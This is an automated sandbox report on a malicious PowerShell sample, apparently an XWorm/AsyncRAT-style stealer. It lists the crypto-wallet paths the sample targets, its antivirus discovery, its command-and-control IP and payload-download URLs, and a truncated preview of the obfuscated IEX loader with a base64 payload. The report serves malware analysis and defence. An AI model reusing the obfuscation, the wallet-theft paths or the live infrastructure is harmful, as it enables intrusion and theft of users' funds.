Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegSvcs.exe, 00000003.00000002.4573562454.0000000005719000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets
Source: RegSvcs.exe, 00000003.00000002.4574172344.0000000006231000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: RegSvcs.exe, 00000003.00000002.4572969033.0000000005630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet*8
Source: RegSvcs.exe, 00000003.00000002.4573562454.0000000005719000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: RegSvcs.exe, 00000003.00000002.4572969033.0000000005630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet*8
Source: RegSvcs.exe, 00000003.00000002.4573562454.0000000005719000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: powershell.exe, 00000000.00000002.2151049582.00007FF849100000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: sqlcolumnencryptionkeystoreprovider

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt

Jump to behavior

Source: Yara match	File source: 00000003.00000002.4558584705.0000000002AFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5796, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	321 Windows Management Instrumentation	1 DLL Side-Loading	212 Process Injection	1 Disable or Modify Tools	OS Credential Dumping	421 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	331 Virtualization/Sandbox Evasion	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Data from Local System	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	212 Process Injection	Security Account Manager	331 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Clipboard Data	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	213 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
92.255.57.112.ps1	7%	Virustotal		Browse
92.255.57.112.ps1	3%	ReversingLabs

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000000.00000002.2136758256.000001E64B0FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2119166269.000001E63CB42000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000000.00000002.2119166269.000001E63C80C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://stackoverflow.com/q/14436606/23354	RegSvcs.exe, 00000003.00000002.4558584705.0000000002AFE000.00000004.00000800.00020000.00000000.sdmp	false	high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000000.00000002.2119166269.000001E63C9F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2119166269.000001E63C80C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2146175940.000001E652F70000.00000004.00000020.00020000.00000000.sdmp	false	high
https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dll	RegSvcs.exe, 00000003.00000002.4558584705.0000000002AFE000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000000.00000002.2119166269.000001E63C9F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2119166269.000001E63C80C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2146175940.000001E652F70000.00000004.00000020.00020000.00000000.sdmp	false	high
https://stackoverflow.com/q/2152978/23354rCannot	RegSvcs.exe, 00000003.00000002.4558584705.0000000002AFE000.00000004.00000800.00020000.00000000.sdmp	false	high
https://go.micro	powershell.exe, 00000000.00000002.2119166269.000001E63C252000.00000004.00000800.00020000.00000000.sdmp	false	high
https://stackoverflow.com/q/11564914/23354;	RegSvcs.exe, 00000003.00000002.4558584705.0000000002AFE000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exe	RegSvcs.exe, 00000003.00000002.4558584705.0000000002AFE000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/	powershell.exe, 00000000.00000002.2119166269.000001E63CB42000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exe	RegSvcs.exe, 00000003.00000002.4558584705.0000000002AFE000.00000004.00000800.00020000.00000000.sdmp	false	high
https://nuget.org/nuget.exe	powershell.exe, 00000000.00000002.2136758256.000001E64B0FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2119166269.000001E63CB42000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/License	powershell.exe, 00000000.00000002.2119166269.000001E63CB42000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/Icon	powershell.exe, 00000000.00000002.2119166269.000001E63CB42000.00000004.00000800.00020000.00000000.sdmp	false	high
https://oneget.orgX	powershell.exe, 00000000.00000002.2119166269.000001E63C80C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://aka.ms/pscore68	powershell.exe, 00000000.00000002.2119166269.000001E63AF71000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.2119166269.000001E63AF71000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4558584705.0000000002AFE000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/Pester/Pester	powershell.exe, 00000000.00000002.2119166269.000001E63C9F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2119166269.000001E63C80C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2146175940.000001E652F70000.00000004.00000020.00020000.00000000.sdmp	false	high
https://oneget.org	powershell.exe, 00000000.00000002.2119166269.000001E63C80C000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
92.255.57.112	unknown	Russian Federation		42253	TELSPRU	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1591628
Start date and time:	2025-01-15 08:23:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	92.255.57.112.ps1
Detection:	MAL
Classification:	mal88.spyw.evad.winPS1@4/7@0/1
EGA Information:	Failed
HCA Information:	Successful, ratio: 88% Number of executed functions: 76 Number of non-executed functions: 2
Cookbook Comments:	Found application associated with file extension: .ps1 Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 199.232.210.172, 13.107.246.45, 4.245.163.56, 172.202.163.200
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target RegSvcs.exe, PID 5796 because it is empty
Execution Graph export aborted for target powershell.exe, PID 4088 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:24:08	API Interceptor	10x Sleep call for process: powershell.exe modified
02:24:16	API Interceptor	11071621x Sleep call for process: RegSvcs.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
92.255.57.112	92.255.57_1.112.ps1	Get hash	malicious	XWorm	Browse
92.255.57.112	book_lumm2.dat.exe	Get hash	malicious	XWorm	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bg.microsoft.map.fastly.net	1475127682155276.js	Get hash	malicious	Strela Downloader	Browse	199.232.210.172
	Invdoc80.pdf	Get hash	malicious	HTMLPhisher	Browse	199.232.210.172
	Reversed order 24-25.pdf	Get hash	malicious	Unknown	Browse	199.232.210.172
	wmnq39xe8J.dll	Get hash	malicious	Wannacry	Browse	199.232.214.172
	Final-Agreement-Document#808977735.pdf	Get hash	malicious	HTMLPhisher	Browse	199.232.210.172
	tTbeoLWNhb.dll	Get hash	malicious	Wannacry	Browse	199.232.214.172
	Document-01-16-25.pdf	Get hash	malicious	Unknown	Browse	199.232.210.172
	Eastern Contractors Corporation Contract and submittal document.eml	Get hash	malicious	Unknown	Browse	199.232.214.172
	v9xYj92wR3.dll	Get hash	malicious	Wannacry	Browse	199.232.214.172
	https://securityalert-corporate.com/click/f288bff9-842d-4e34-8d2d-41ad20e48e9d	Get hash	malicious	Unknown	Browse	199.232.214.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELSPRU	WZ6RvDzQeq.exe	Get hash	malicious	Unknown	Browse	92.255.57.155
	WZ6RvDzQeq.exe	Get hash	malicious	Unknown	Browse	92.255.57.155
	2.ps1	Get hash	malicious	Unknown	Browse	92.255.57.155
	2.ps1	Get hash	malicious	Unknown	Browse	92.255.57.155
	92.255.57_1.112.ps1	Get hash	malicious	XWorm	Browse	92.255.57.112
	book_lumm2.dat.exe	Get hash	malicious	XWorm	Browse	92.255.57.112
	http://92.255.57.155/1/1.png	Get hash	malicious	Unknown	Browse	92.255.57.155
	92.255.57.155.ps1	Get hash	malicious	XWorm	Browse	92.255.57.155
	png2obj1_XClient.exe	Get hash	malicious	XWorm	Browse	92.255.57.155

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Reputation:	high, very likely benign file
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.240186510507009
Encrypted:	false
SSDEEP:	6:kKeG3D9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:9qDImsLNkPlE99SNxAhUe/3
MD5:	86CDA0433DC2F94246C6559541A60A3A
SHA1:	DE75B370CDEA48B05C26BDEC3BBBD79A5DA2A95D
SHA-256:	A7795E4E30D6C5BF0D93B694A87D33808E416219D67B07E303A19557632724D7
SHA-512:	4B361218A8DD70D5035A79D7F51A157DF53D7A19C42112E11BA6D97BCCFBECDCCE7B516F1B1EB5105CE9D69BB928A7F010C7A18B1E33591ADBD6C1F6A621AEFB
Malicious:	false
Reputation:	low
Preview:	p...... ........d..{.g..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:NlllulDm0ll//Z:NllU6cl/
MD5:	DA1F22117B9766A1F0220503765A5BA5
SHA1:	D35597157EFE03AA1A88C1834DF8040B3DD3F3CB
SHA-256:	BD022BFCBE39B4DA088DDE302258AE375AAFD6BDA4C7B39A97D80C8F92981C69
SHA-512:	520FA7879AB2A00C86D9982BB057E7D5E243F7FC15A12BA1C823901DC582D2444C76534E955413B0310B9EBD043400907FD412B88927DAD07A1278D3B667E3D9
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e.................................R..............@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mpt3r00s.b1d.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mukhjors.re4.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.700832262998266
Encrypted:	false
SSDEEP:	48:GCgFnQBaCSbU2K+LPukvhkvklCywnn2AtoclzVSogZoegtoclcRVSogZoa1:hg92aCvoCkvhkvCCtLtociHktocC6HF
MD5:	69B0B6B20E3CD7081EAD8FC2D0B1CE0A
SHA1:	66DAA9BC61D1E15BC8FAE78FF1CDA596FD61F7C1
SHA-256:	DFD93D05F927E6A5287EF3331725A81504BAA5822A9D786F12FD173A0961141A
SHA-512:	9C35672C7D72C5307188380540DD4A7869041EFC5B4022F254A4CC5B832B0D48EEB60EAB0D839C7BD00AFE481E448EA247376F30DAEE14DB7506FBC8DC493600
Malicious:	false
Preview:	...................................FL..................F.".. ...d...... T.u.g..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M........q.g..f..u.g......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl/Z.:....B.....................Bdg.A.p.p.D.a.t.a...B.V.1...../Z.;..Roaming.@......DWSl/Z.;....C.....................-/%.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl/Z.:....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW"r..Windows.@......DWSl/Z.:....E.........................W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl/Z.:....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl/Z.:....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl/Z.;....q...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JCZQKXY5ZQZRQ57IWPWJ.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.700832262998266
Encrypted:	false
SSDEEP:	48:GCgFnQBaCSbU2K+LPukvhkvklCywnn2AtoclzVSogZoegtoclcRVSogZoa1:hg92aCvoCkvhkvCCtLtociHktocC6HF
MD5:	69B0B6B20E3CD7081EAD8FC2D0B1CE0A
SHA1:	66DAA9BC61D1E15BC8FAE78FF1CDA596FD61F7C1
SHA-256:	DFD93D05F927E6A5287EF3331725A81504BAA5822A9D786F12FD173A0961141A
SHA-512:	9C35672C7D72C5307188380540DD4A7869041EFC5B4022F254A4CC5B832B0D48EEB60EAB0D839C7BD00AFE481E448EA247376F30DAEE14DB7506FBC8DC493600
Malicious:	false
Preview:	...................................FL..................F.".. ...d...... T.u.g..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M........q.g..f..u.g......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl/Z.:....B.....................Bdg.A.p.p.D.a.t.a...B.V.1...../Z.;..Roaming.@......DWSl/Z.;....C.....................-/%.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl/Z.:....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW"r..Windows.@......DWSl/Z.:....E.........................W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl/Z.:....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl/Z.:....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl/Z.;....q...........

Static File Info

General

File type:	ASCII text, with very long lines (65478), with CRLF line terminators
Entropy (8bit):	5.908191267301583
TrID:
File name:	92.255.57.112.ps1
File size:	526'214 bytes
MD5:	7b7bab781f4b30aee1289f36a01606a0
SHA1:	1b7a8d8302afa6f27f27d3d313865c2a4af61bdd
SHA256:	e82de6b368baabcc81ce3316a319f27173e82b9c2e94a043bf42b62458dc5a98
SHA512:	6bdbed54c70d1fbba9e5d3ef620a89c3a9a285177d2a646ecf478808d6b15372e6e3ca1b59c76a36f7a8a2a63c245b4eb6ab4a5a879ecc06446ae123ab62a927
SSDEEP:	12288:eFwowo0VN2VOhllXKS2Utye+jF2RZQcqNStpIOe0Ti0dBmEv7:2S37hloSTtKF2RZQHGuvo
TLSH:	D3B401731617FC8F67AF1F89E9003B952C7C943B6B1C4058F9C90BA990EA520DE6AD74
File Content Preview:	.. $t0='IQIQQIIQIQQEX'.replace('IQIQQ','');sal GG $t0;....$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAKcOfWcAAAAAAA

File Icon


Icon Hash:	3270d6baae77db44

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-15T08:24:16.293498+0100	2035595	ET MALWARE Generic AsyncRAT Style SSL Cert	1	92.255.57.112	56001	192.168.2.5	49706	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 15, 2025 08:24:15.576708078 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:24:15.581614017 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:24:15.581723928 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:24:15.583267927 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:24:15.588116884 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:24:15.596251011 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:24:15.601058960 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:24:16.281148911 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:24:16.281215906 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:24:16.281352043 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:24:16.288609028 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:24:16.293498039 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:24:16.506381035 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:24:16.558806896 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:24:17.722491980 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:24:17.727277040 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:24:17.727350950 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:24:17.732129097 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:24:39.388222933 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:24:39.393496990 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:24:39.393570900 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:24:39.399384022 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:24:39.775207996 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:24:39.824541092 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:24:39.948204041 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:24:39.964395046 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:24:39.969295025 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:24:39.969382048 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:24:39.974314928 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:24:53.280827045 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:24:53.324445963 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:24:53.448434114 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:24:53.496335983 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:25:01.390446901 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:25:01.395311117 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:25:01.395368099 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:25:01.400150061 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:25:01.768558025 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:25:01.824505091 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:25:01.933900118 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:25:01.942583084 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:25:01.947586060 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:25:01.947669983 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:25:01.952544928 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:25:23.400758982 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:25:23.405641079 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:25:23.406455994 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:25:23.411251068 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:25:23.785527945 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:25:23.840110064 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:25:23.949197054 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:25:23.953308105 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:25:23.958230972 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:25:23.959398985 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:25:23.964293957 CET	56001	49706	92.255.57.112	192.168.2.5
